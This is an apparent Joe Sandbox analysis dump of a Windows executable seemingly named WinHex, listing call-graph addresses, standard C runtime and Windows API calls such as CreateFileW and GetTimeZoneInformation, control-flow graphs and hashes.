7ff7c5bd2e5a 16561->16562 16563 7ff7c5bd2e6b 16562->16563 16591 7ff7c5be4e08 16562->16591 16565 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16563->16565 16566 7ff7c5bd2a8d 16565->16566 16566->15878 16566->15879 16568 7ff7c5bd660e 16567->16568 16569 7ff7c5bd3cb0 116 API calls 16568->16569 16570 7ff7c5bd6635 16569->16570 16571 7ff7c5bd6a40 136 API calls 16570->16571 16572 7ff7c5bd6643 16571->16572 16573 7ff7c5bd66f3 16572->16573 16575 7ff7c5bd665d 16572->16575 16592 7ff7c5be4e25 16591->16592 16593 7ff7c5be4e31 16591->16593 16608 7ff7c5be4680 16592->16608 16633 7ff7c5be4a1c 16593->16633 16596 7ff7c5be4e2a 16596->16563 16599 7ff7c5be4e69 16644 7ff7c5be4504 16599->16644 16602 7ff7c5be4ec5 16602->16596 16606 7ff7c5be9e18 __free_lconv_mon 11 API calls 16602->16606 16603 7ff7c5be4ed9 16604 7ff7c5be4680 69 API calls 16603->16604 16605 7ff7c5be4ee5 16604->16605 16605->16596 16607 7ff7c5be9e18 __free_lconv_mon 11 API calls 16605->16607 16606->16596 16607->16596 16609 7ff7c5be46b7 16608->16609 16610 7ff7c5be469a 16608->16610 16609->16610 16612 7ff7c5be46ca CreateFileW 16609->16612 16611 7ff7c5be4424 _fread_nolock 11 API calls 16610->16611 16613 7ff7c5be469f 16611->16613 16614 7ff7c5be4734 16612->16614 16615 7ff7c5be46fe 16612->16615 16617 7ff7c5be4444 _wfindfirst32i64 11 API calls 16613->16617 16692 7ff7c5be4cf8 16614->16692 16666 7ff7c5be47d4 GetFileType 16615->16666 16620 7ff7c5be46a7 16617->16620 16624 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 16620->16624 16622 7ff7c5be473d 16623 7ff7c5be4768 16629 7ff7c5be46b2 16624->16629 16625 7ff7c5be4713 CloseHandle 16625->16629 16626 7ff7c5be4729 CloseHandle 16626->16629 16629->16596 16634 7ff7c5be4a40 16633->16634 16635 7ff7c5be4a3b 16633->16635 16634->16635 16636 7ff7c5bea620 _CallSETranslator 45 API calls 16634->16636 16635->16599 16641 7ff7c5bedfcc 16635->16641 16637 7ff7c5be4a5b 16636->16637 16754 7ff7c5becb2c 16637->16754 16762 7ff7c5beddb8 16641->16762 16645 7ff7c5be4552 16644->16645 16646 7ff7c5be452e 16644->16646 16647 7ff7c5be45ac 16645->16647 16648 7ff7c5be4557 16645->16648 16650 7ff7c5be9e18 __free_lconv_mon 11 API calls 16646->16650 16655 7ff7c5be453d 16646->16655 16771 7ff7c5bee7f0 16647->16771 16651 7ff7c5be456c 16648->16651 16652 7ff7c5be9e18 __free_lconv_mon 11 API calls 16648->16652 16648->16655 16650->16655 16653 7ff7c5becacc _fread_nolock 12 API calls 16651->16653 16652->16651 16653->16655 16655->16602 16655->16603 16667 7ff7c5be48df 16666->16667 16668 7ff7c5be4822 16666->16668 16669 7ff7c5be48e7 16667->16669 16670 7ff7c5be4909 16667->16670 16671 7ff7c5be484e GetFileInformationByHandle 16668->16671 16676 7ff7c5be4bf4 21 API calls 16668->16676 16672 7ff7c5be48eb 16669->16672 16673 7ff7c5be48fa GetLastError 16669->16673 16675 7ff7c5be492c PeekNamedPipe 16670->16675 16681 7ff7c5be48ca 16670->16681 16671->16673 16674 7ff7c5be4877 16671->16674 16677 7ff7c5be4444 _wfindfirst32i64 11 API calls 16672->16677 16679 7ff7c5be43b8 _fread_nolock 11 API calls 16673->16679 16678 7ff7c5be4ab8 51 API calls 16674->16678 16675->16681 16680 7ff7c5be483c 16676->16680 16677->16681 16682 7ff7c5be4882 16678->16682 16679->16681 16680->16671 16680->16681 16683 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16681->16683 16730 7ff7c5be497c 16682->16730 16685 7ff7c5be470c 16683->16685 16685->16625 16685->16626 16693 7ff7c5be4d2e 16692->16693 16694 7ff7c5be4444 _wfindfirst32i64 11 API calls 16693->16694 16707 7ff7c5be4dc6 __std_exception_copy 16693->16707 16696 7ff7c5be4d40 16694->16696 16695 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16697 7ff7c5be4739 16695->16697 16698 7ff7c5be4444 _wfindfirst32i64 11 API calls 16696->16698 16697->16622 16697->16623 16699 7ff7c5be4d48 16698->16699 16700 7ff7c5be5348 45 API calls 16699->16700 16707->16695 16755 7ff7c5becb41 16754->16755 16756 7ff7c5be4a7e 16754->16756 16755->16756 16757 7ff7c5bf2424 45 API calls 16755->16757 16758 7ff7c5becb98 16756->16758 16757->16756 16759 7ff7c5becbc0 16758->16759 16760 7ff7c5becbad 16758->16760 16759->16635 16760->16759 16761 7ff7c5bf1790 45 API calls 16760->16761 16761->16759 16763 7ff7c5bede15 16762->16763 16769 7ff7c5bede10 __vcrt_InitializeCriticalSectionEx 16762->16769 16763->16599 16764 7ff7c5bede45 LoadLibraryExW 16766 7ff7c5bedf1a 16764->16766 16767 7ff7c5bede6a GetLastError 16764->16767 16765 7ff7c5bedf3a GetProcAddress 16765->16763 16766->16765 16768 7ff7c5bedf31 FreeLibrary 16766->16768 16767->16769 16768->16765 16769->16763 16769->16764 16769->16765 16770 7ff7c5bedea4 LoadLibraryExW 16769->16770 16770->16766 16770->16769 16773 7ff7c5bee7f9 MultiByteToWideChar 16771->16773 16801 7ff7c5be918d 16800->16801 16803 7ff7c5bd707a 16800->16803 16802 7ff7c5be4444 _wfindfirst32i64 11 API calls 16801->16802 16804 7ff7c5be9192 16802->16804 16806 7ff7c5be6ef8 16803->16806 16805 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 16804->16805 16805->16803 16807 7ff7c5be6f01 16806->16807 16810 7ff7c5be6f16 16806->16810 16808 7ff7c5be4424 _fread_nolock 11 API calls 16807->16808 16811 7ff7c5be4424 _fread_nolock 11 API calls 16810->16811 16815 7ff7c5be6f0e 16810->16815 16819 7ff7c5bdb04e RtlLookupFunctionEntry 16818->16819 16820 7ff7c5bdb064 RtlVirtualUnwind 16819->16820 16821 7ff7c5bdae6b 16819->16821 16820->16819 16820->16821 16822 7ff7c5bdae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16821->16822 16824 7ff7c5be53fc 16823->16824 16825 7ff7c5be5422 16824->16825 16828 7ff7c5be5455 16824->16828 16826 7ff7c5be4444 _wfindfirst32i64 11 API calls 16825->16826 16827 7ff7c5be5427 16826->16827 16829 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 16827->16829 16830 7ff7c5be545b 16828->16830 16831 7ff7c5be5468 16828->16831 16835 7ff7c5bd3d09 16829->16835 16833 7ff7c5be4444 _wfindfirst32i64 11 API calls 16830->16833 16842 7ff7c5bea0f8 16831->16842 16833->16835 16835->15070 16855 7ff7c5bef788 EnterCriticalSection 16842->16855 17203 7ff7c5be7968 17202->17203 17206 7ff7c5be7444 17203->17206 17205 7ff7c5be7981 17205->15080 17207 7ff7c5be745f 17206->17207 17208 7ff7c5be748e 17206->17208 17210 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 17207->17210 17216 7ff7c5be42ec EnterCriticalSection 17208->17216 17211 7ff7c5be747f 17210->17211 17211->17205 17218 7ff7c5bdf0a3 17217->17218 17219 7ff7c5bdf0d1 17217->17219 17220 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 17218->17220 17226 7ff7c5bdf0c3 17219->17226 17227 7ff7c5be42ec EnterCriticalSection 17219->17227 17220->17226 17226->15084 17229 7ff7c5bd12c6 17228->17229 17230 7ff7c5bd12f8 17228->17230 17231 7ff7c5bd3cb0 116 API calls 17229->17231 17232 7ff7c5bdf934 73 API calls 17230->17232 17233 7ff7c5bd12d6 17231->17233 17234 7ff7c5bd130a 17232->17234 17233->17230 17235 7ff7c5bd12de 17233->17235 17236 7ff7c5bd132f 17234->17236 17237 7ff7c5bd130e 17234->17237 17238 7ff7c5bd2770 59 API calls 17235->17238 17242 7ff7c5bd1364 17236->17242 17243 7ff7c5bd1344 17236->17243 17239 7ff7c5bd24d0 59 API calls 17237->17239 17240 7ff7c5bd12ee 17238->17240 17241 7ff7c5bd1325 17239->17241 17240->15094 17241->15094 17245 7ff7c5bd137e 17242->17245 17251 7ff7c5bd1395 17242->17251 17244 7ff7c5bd24d0 59 API calls 17243->17244 17248 7ff7c5bd135f __std_exception_copy 17244->17248 17246 7ff7c5bd1050 98 API calls 17245->17246 17246->17248 17247 7ff7c5bd1421 17247->15094 17248->17247 17250 7ff7c5bdf2ac 74 API calls 17248->17250 17249 7ff7c5bdf5fc _fread_nolock 53 API calls 17249->17251 17250->17247 17251->17248 17251->17249 17252 7ff7c5bd13de 17251->17252 17253 7ff7c5bd24d0 59 API calls 17252->17253 17253->17248 17255 7ff7c5bd1b30 49 API calls 17254->17255 17256 7ff7c5bd3d60 17255->17256 17256->15096 17256->17256 17258 7ff7c5bd1666 17257->17258 17259 7ff7c5bd16aa 17257->17259 17258->17259 17260 7ff7c5bd2770 59 API calls 17258->17260 17259->15112 17261 7ff7c5bd16be 17260->17261 17261->15112 17263 7ff7c5bd7a30 57 API calls 17262->17263 17264 7ff7c5bd71c7 LoadLibraryExW 17263->17264 17265 7ff7c5bd71e4 __std_exception_copy 17264->17265 17265->15121 17266->15196 17267->15194 17269 7ff7c5bd4970 17268->17269 17270 7ff7c5bd1b30 49 API calls 17269->17270 17271 7ff7c5bd49a2 17270->17271 17272 7ff7c5bd49cb 17271->17272 17273 7ff7c5bd49ab 17271->17273 17275 7ff7c5bd4a22 17272->17275 17277 7ff7c5bd3d30 49 API calls 17272->17277 17274 7ff7c5bd2770 59 API calls 17273->17274 17295 7ff7c5bd49c1 17274->17295 17276 7ff7c5bd3d30 49 API calls 17275->17276 17278 7ff7c5bd4a3b 17276->17278 17279 7ff7c5bd49ec 17277->17279 17280 7ff7c5bd4a59 17278->17280 17283 7ff7c5bd2770 59 API calls 17278->17283 17281 7ff7c5bd4a0a 17279->17281 17285 7ff7c5bd2770 59 API calls 17279->17285 17284 7ff7c5bd71b0 58 API calls 17280->17284 17353 7ff7c5bd3c40 17281->17353 17282 7ff7c5bdad80 _wfindfirst32i64 8 API calls 17287 7ff7c5bd30be 17282->17287 17283->17280 17288 7ff7c5bd4a66 17284->17288 17285->17281 17287->15206 17296 7ff7c5bd4ce0 17287->17296 17290 7ff7c5bd4a6b 17288->17290 17291 7ff7c5bd4a8d 17288->17291 17292 7ff7c5bd2620 57 API calls 17290->17292 17359 7ff7c5bd3df0 GetProcAddress 17291->17359 17292->17295 17294 7ff7c5bd71b0 58 API calls 17294->17275 17295->17282 17297 7ff7c5bd6990 61 API calls 17296->17297 17299 7ff7c5bd4cf5 17297->17299 17298 7ff7c5bd4d10 17300 7ff7c5bd7a30 57 API calls 17298->17300 17299->17298 17301 7ff7c5bd2880 59 API calls 17299->17301 17302 7ff7c5bd4d54 17300->17302 17301->17298 17303 7ff7c5bd4d70 17302->17303 17304 7ff7c5bd4d59 17302->17304 17307 7ff7c5bd7a30 57 API calls 17303->17307 17305 7ff7c5bd2770 59 API calls 17304->17305 17306 7ff7c5bd4d65 17305->17306 17306->15208 17308 7ff7c5bd4da5 17307->17308 17310 7ff7c5bd1b30 49 API calls 17308->17310 17322 7ff7c5bd4daa __std_exception_copy 17308->17322 17309 7ff7c5bd2770 59 API calls 17311 7ff7c5bd4f51 17309->17311 17312 7ff7c5bd4e27 17310->17312 17311->15208 17313 7ff7c5bd4e53 17312->17313 17314 7ff7c5bd4e2e 17312->17314 17316 7ff7c5bd7a30 57 API calls 17313->17316 17315 7ff7c5bd2770 59 API calls 17314->17315 17317 7ff7c5bd4e43 17315->17317 17318 7ff7c5bd4e6c 17316->17318 17317->15208 17318->17322 17322->17309 17323 7ff7c5bd4f3a 17322->17323 17323->15208 17325 7ff7c5bd46f7 17324->17325 17325->17325 17326 7ff7c5bd4720 17325->17326 17333 7ff7c5bd4737 __std_exception_copy 17325->17333 17327 7ff7c5bd2770 59 API calls 17326->17327 17329 7ff7c5bd481b 17330 7ff7c5bd12b0 122 API calls 17330->17333 17331 7ff7c5bd1780 59 API calls 17331->17333 17332 7ff7c5bd2770 59 API calls 17332->17333 17333->17329 17333->17330 17333->17331 17333->17332 17354 7ff7c5bd3c4a 17353->17354 17355 7ff7c5bd7a30 57 API calls 17354->17355 17356 7ff7c5bd3c72 17355->17356 17357 7ff7c5bdad80 _wfindfirst32i64 8 API calls 17356->17357 17358 7ff7c5bd3c9a 17357->17358 17358->17275 17358->17294 17360 7ff7c5bd3e3b GetProcAddress 17359->17360 17361 7ff7c5bd3e18 17359->17361 17360->17361 17362 7ff7c5bd3e60 GetProcAddress 17360->17362 17363 7ff7c5bd2620 57 API calls 17361->17363 17362->17361 17364 7ff7c5bd3e85 GetProcAddress 17362->17364 17365 7ff7c5bd3e2b 17363->17365 17364->17361 17366 7ff7c5bd3ead GetProcAddress 17364->17366 17365->17295 17366->17361 17367 7ff7c5bd3ed5 GetProcAddress 17366->17367 17367->17361 17368 7ff7c5bd3efd GetProcAddress 17367->17368 17369 7ff7c5bd3f25 GetProcAddress 17368->17369 17370 7ff7c5bd3f19 17368->17370 17371 7ff7c5bd3f41 17369->17371 17372 7ff7c5bd3f4d GetProcAddress 17369->17372 17370->17369 17371->17372 17373 7ff7c5bd3f69 17372->17373 17634 7ff7c5bea620 _CallSETranslator 45 API calls 17633->17634 17635 7ff7c5be90e1 17634->17635 17636 7ff7c5be920c _CallSETranslator 45 API calls 17635->17636 17637 7ff7c5be9101 17636->17637 18715 7ff7c5bdb0b0 18716 7ff7c5bdb0c0 18715->18716 18732 7ff7c5be579c 18716->18732 18718 7ff7c5bdb0cc 18738 7ff7c5bdb3b8 18718->18738 18720 7ff7c5bdb69c 7 API calls 18722 7ff7c5bdb165 18720->18722 18721 7ff7c5bdb0e4 _RTC_Initialize 18730 7ff7c5bdb139 18721->18730 18743 7ff7c5bdb568 18721->18743 18724 7ff7c5bdb0f9 18746 7ff7c5be7e6c 18724->18746 18730->18720 18731 7ff7c5bdb155 18730->18731 18733 7ff7c5be57ad 18732->18733 18734 7ff7c5be57b5 18733->18734 18735 7ff7c5be4444 _wfindfirst32i64 11 API calls 18733->18735 18734->18718 18736 7ff7c5be57c4 18735->18736 18737 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18736->18737 18737->18734 18739 7ff7c5bdb3c9 18738->18739 18742 7ff7c5bdb3ce __scrt_acquire_startup_lock 18738->18742 18740 7ff7c5bdb69c 7 API calls 18739->18740 18739->18742 18741 7ff7c5bdb442 18740->18741 18742->18721 18771 7ff7c5bdb52c 18743->18771 18745 7ff7c5bdb571 18745->18724 18747 7ff7c5be7e8c 18746->18747 18748 7ff7c5bdb105 18746->18748 18749 7ff7c5be7e94 18747->18749 18750 7ff7c5be7eaa GetModuleFileNameW 18747->18750 18748->18730 18770 7ff7c5bdb63c InitializeSListHead 18748->18770 18751 7ff7c5be4444 _wfindfirst32i64 11 API calls 18749->18751 18754 7ff7c5be7ed5 18750->18754 18752 7ff7c5be7e99 18751->18752 18753 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18752->18753 18753->18748 18755 7ff7c5be7e0c 11 API calls 18754->18755 18756 7ff7c5be7f15 18755->18756 18757 7ff7c5be7f1d 18756->18757 18760 7ff7c5be7f35 18756->18760 18758 7ff7c5be4444 _wfindfirst32i64 11 API calls 18757->18758 18759 7ff7c5be7f22 18758->18759 18762 7ff7c5be9e18 __free_lconv_mon 11 API calls 18759->18762 18761 7ff7c5be7f57 18760->18761 18764 7ff7c5be7f83 18760->18764 18765 7ff7c5be7f9c 18760->18765 18763 7ff7c5be9e18 __free_lconv_mon 11 API calls 18761->18763 18762->18748 18763->18748 18766 7ff7c5be9e18 __free_lconv_mon 11 API calls 18764->18766 18767 7ff7c5be9e18 __free_lconv_mon 11 API calls 18765->18767 18768 7ff7c5be7f8c 18766->18768 18767->18761 18769 7ff7c5be9e18 __free_lconv_mon 11 API calls 18768->18769 18769->18748 18772 7ff7c5bdb546 18771->18772 18774 7ff7c5bdb53f 18771->18774 18775 7ff7c5be8eec 18772->18775 18774->18745 18778 7ff7c5be8b28 18775->18778 18785 7ff7c5bef788 EnterCriticalSection 18778->18785 19339 7ff7c5be8a50 19342 7ff7c5be89d0 19339->19342 19349 7ff7c5bef788 EnterCriticalSection 19342->19349

                                                                                                                        Executed Functions

                                                                                                                        Function 00007FF7C5BF4E20 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 135 7ff7c5bf4e20-7ff7c5bf4e5b call 7ff7c5bf47a8 call 7ff7c5bf47b0 call 7ff7c5bf4818 142 7ff7c5bf5085-7ff7c5bf50d1 call 7ff7c5be9dd0 call 7ff7c5bf47a8 call 7ff7c5bf47b0 call 7ff7c5bf4818 135->142 143 7ff7c5bf4e61-7ff7c5bf4e6c call 7ff7c5bf47b8 135->143 169 7ff7c5bf520f-7ff7c5bf527d call 7ff7c5be9dd0 call 7ff7c5bf06b8 142->169 170 7ff7c5bf50d7-7ff7c5bf50e2 call 7ff7c5bf47b8 142->170 143->142 148 7ff7c5bf4e72-7ff7c5bf4e7c 143->148 150 7ff7c5bf4e9e-7ff7c5bf4ea2 148->150 151 7ff7c5bf4e7e-7ff7c5bf4e81 148->151 154 7ff7c5bf4ea5-7ff7c5bf4ead 150->154 153 7ff7c5bf4e84-7ff7c5bf4e8f 151->153 156 7ff7c5bf4e91-7ff7c5bf4e98 153->156 157 7ff7c5bf4e9a-7ff7c5bf4e9c 153->157 154->154 158 7ff7c5bf4eaf-7ff7c5bf4ec2 call 7ff7c5becacc 154->158 156->153 156->157 157->150 160 7ff7c5bf4ecb-7ff7c5bf4ed9 157->160 165 7ff7c5bf4ec4-7ff7c5bf4ec6 call 7ff7c5be9e18 158->165 166 7ff7c5bf4eda-7ff7c5bf4ee6 call 7ff7c5be9e18 158->166 165->160 175 7ff7c5bf4eed-7ff7c5bf4ef5 166->175 189 7ff7c5bf527f-7ff7c5bf5286 169->189 190 7ff7c5bf528b-7ff7c5bf528e 169->190 170->169 180 7ff7c5bf50e8-7ff7c5bf50f3 call 7ff7c5bf47e8 170->180 175->175 178 7ff7c5bf4ef7-7ff7c5bf4f08 call 7ff7c5bef924 175->178 178->142 188 7ff7c5bf4f0e-7ff7c5bf4f64 call 7ff7c5bdc210 * 4 call 7ff7c5bf4d3c 178->188 180->169 187 7ff7c5bf50f9-7ff7c5bf511c call 7ff7c5be9e18 GetTimeZoneInformation 180->187 202 7ff7c5bf51e4-7ff7c5bf520e call 7ff7c5bf47a0 call 7ff7c5bf4790 call 7ff7c5bf4798 187->202 203 7ff7c5bf5122-7ff7c5bf5143 187->203 248 7ff7c5bf4f66-7ff7c5bf4f6a 188->248 193 7ff7c5bf531b-7ff7c5bf531e 189->193 194 7ff7c5bf52c5-7ff7c5bf52d8 call 7ff7c5becacc 190->194 195 7ff7c5bf5290 190->195 199 7ff7c5bf5293 193->199 200 7ff7c5bf5324-7ff7c5bf532c call 7ff7c5bf4e20 193->200 208 7ff7c5bf52e3-7ff7c5bf52fe call 7ff7c5bf06b8 194->208 209 7ff7c5bf52da 194->209 195->199 205 7ff7c5bf5298-7ff7c5bf52c4 call 7ff7c5be9e18 call 7ff7c5bdad80 199->205 206 7ff7c5bf5293 call 7ff7c5bf509c 199->206 200->205 210 7ff7c5bf5145-7ff7c5bf514b 203->210 211 7ff7c5bf514e-7ff7c5bf5155 203->211 206->205 231 7ff7c5bf5305-7ff7c5bf5317 call 7ff7c5be9e18 208->231 232 7ff7c5bf5300-7ff7c5bf5303 208->232 216 7ff7c5bf52dc-7ff7c5bf52e1 call 7ff7c5be9e18 209->216 210->211 218 7ff7c5bf5169 211->218 219 7ff7c5bf5157-7ff7c5bf515f 211->219 216->195 228 7ff7c5bf516b-7ff7c5bf51df call 7ff7c5bdc210 * 4 call 7ff7c5bf1c7c call 7ff7c5bf5334 * 2 218->228 219->218 225 7ff7c5bf5161-7ff7c5bf5167 219->225 225->228 228->202 231->193 232->216 249 7ff7c5bf4f70-7ff7c5bf4f74 248->249 250 7ff7c5bf4f6c 248->250 249->248 252 7ff7c5bf4f76-7ff7c5bf4f9b call 7ff7c5bf7c64 249->252 250->249 258 7ff7c5bf4f9e-7ff7c5bf4fa2 252->258 260 7ff7c5bf4fa4-7ff7c5bf4faf 258->260 261 7ff7c5bf4fb1-7ff7c5bf4fb5 258->261 260->261 263 7ff7c5bf4fb7-7ff7c5bf4fbb 260->263 261->258 266 7ff7c5bf4fbd-7ff7c5bf4fe5 call 7ff7c5bf7c64 263->266 267 7ff7c5bf503c-7ff7c5bf5040 263->267 275 7ff7c5bf5003-7ff7c5bf5007 266->275 276 7ff7c5bf4fe7 266->276 268 7ff7c5bf5042-7ff7c5bf5044 267->268 269 7ff7c5bf5047-7ff7c5bf5054 267->269 268->269 271 7ff7c5bf5056-7ff7c5bf506c call 7ff7c5bf4d3c 269->271 272 7ff7c5bf506f-7ff7c5bf507e call 7ff7c5bf47a0 call 7ff7c5bf4790 269->272 271->272 272->142 275->267 278 7ff7c5bf5009-7ff7c5bf5027 call 7ff7c5bf7c64 275->278 280 7ff7c5bf4fea-7ff7c5bf4ff1 276->280 287 7ff7c5bf5033-7ff7c5bf503a 278->287 280->275 283 7ff7c5bf4ff3-7ff7c5bf5001 280->283 283->275 283->280 287->267 288 7ff7c5bf5029-7ff7c5bf502d 287->288 288->267 289 7ff7c5bf502f 288->289 289->287
                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF4E65
                                                                                                                          • Part of subcall function 00007FF7C5BF47B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF47CC
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
                                                                                                                          • Part of subcall function 00007FF7C5BE9DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C5BE9DAF,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BE9DD9
                                                                                                                          • Part of subcall function 00007FF7C5BE9DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C5BE9DAF,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BE9DFE
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF4E54
                                                                                                                          • Part of subcall function 00007FF7C5BF4818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BF482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50CA
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50DB
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7C5BF50EC
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C5BF532C), ref: 00007FF7C5BF5113
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                        • Opcode ID: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                                                                                        • Instruction ID: 5b4f327396a9b42a5fc3ec3c3c543d5a87626e8d26306c61f825dc9e22681a3a
                                                                                                                        • Opcode Fuzzy Hash: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                                                                                        • Instruction Fuzzy Hash: 0FD1B12AA0865286EB24FF25D5405B9FBA1FF84FA4FC44235DA0D476C6DF3EE4418760
                                                                                                                        Function 00007FF7C5BF5D6C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 320 7ff7c5bf5d6c-7ff7c5bf5ddf call 7ff7c5bf5aa0 323 7ff7c5bf5de1-7ff7c5bf5dea call 7ff7c5be4424 320->323 324 7ff7c5bf5df9-7ff7c5bf5e03 call 7ff7c5be6cfc 320->324 329 7ff7c5bf5ded-7ff7c5bf5df4 call 7ff7c5be4444 323->329 330 7ff7c5bf5e05-7ff7c5bf5e1c call 7ff7c5be4424 call 7ff7c5be4444 324->330 331 7ff7c5bf5e1e-7ff7c5bf5e87 CreateFileW 324->331 344 7ff7c5bf613a-7ff7c5bf615a 329->344 330->329 332 7ff7c5bf5f04-7ff7c5bf5f0f GetFileType 331->332 333 7ff7c5bf5e89-7ff7c5bf5e8f 331->333 339 7ff7c5bf5f11-7ff7c5bf5f4c GetLastError call 7ff7c5be43b8 CloseHandle 332->339 340 7ff7c5bf5f62-7ff7c5bf5f69 332->340 336 7ff7c5bf5ed1-7ff7c5bf5eff GetLastError call 7ff7c5be43b8 333->336 337 7ff7c5bf5e91-7ff7c5bf5e95 333->337 336->329 337->336 342 7ff7c5bf5e97-7ff7c5bf5ecf CreateFileW 337->342 339->329 355 7ff7c5bf5f52-7ff7c5bf5f5d call 7ff7c5be4444 339->355 347 7ff7c5bf5f71-7ff7c5bf5f74 340->347 348 7ff7c5bf5f6b-7ff7c5bf5f6f 340->348 342->332 342->336 349 7ff7c5bf5f7a-7ff7c5bf5fcf call 7ff7c5be6c14 347->349 350 7ff7c5bf5f76 347->350 348->349 358 7ff7c5bf5fd1-7ff7c5bf5fdd call 7ff7c5bf5ca8 349->358 359 7ff7c5bf5fee-7ff7c5bf601f call 7ff7c5bf5820 349->359 350->349 355->329 358->359 365 7ff7c5bf5fdf 358->365 366 7ff7c5bf6025-7ff7c5bf6067 359->366 367 7ff7c5bf6021-7ff7c5bf6023 359->367 368 7ff7c5bf5fe1-7ff7c5bf5fe9 call 7ff7c5be9f90 365->368 369 7ff7c5bf6089-7ff7c5bf6094 366->369 370 7ff7c5bf6069-7ff7c5bf606d 366->370 367->368 368->344 372 7ff7c5bf609a-7ff7c5bf609e 369->372 373 7ff7c5bf6138 369->373 370->369 371 7ff7c5bf606f-7ff7c5bf6084 370->371 371->369 372->373 375 7ff7c5bf60a4-7ff7c5bf60e9 CloseHandle CreateFileW 372->375 373->344 377 7ff7c5bf611e-7ff7c5bf6133 375->377 378 7ff7c5bf60eb-7ff7c5bf6119 GetLastError call 7ff7c5be43b8 call 7ff7c5be6e3c 375->378 377->373 378->377
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617910340-0
                                                                                                                        • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                        • Instruction ID: f737dd5b76567061bcc3da2b810e28fca792003e60428f0cf9cd1e9b8276b805
                                                                                                                        • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
